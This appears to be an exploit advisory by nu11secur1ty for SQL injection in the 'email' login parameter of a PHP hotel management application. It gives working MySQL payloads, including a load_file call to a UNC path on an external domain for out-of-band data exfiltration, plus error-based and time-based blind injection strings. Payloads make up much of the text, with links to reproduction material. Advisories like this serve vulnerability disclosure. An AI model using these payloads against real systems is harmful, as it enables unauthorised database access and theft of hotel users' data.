## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi
## Author: nu11secur1ty
## Date: 08.03.2022
## Vendor: https://www.nikhilbhalerao.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022
## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+'
was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can easily get the all database from this hotel system
and can do very malicious stuff with the users who are inside of this
system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: email=hmqHtDjH@burpcollaborator.net'+(select
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT
0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT
COUNT(*),CONCAT(0x7162787671,(SELECT
(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a))||'&password=m5S!k0l!S6&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=hmqHtDjH@burpcollaborator.net'+(select
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT
0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM
(SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)
## Proof and Exploit:
[href](https://streamable.com/uk7zq2)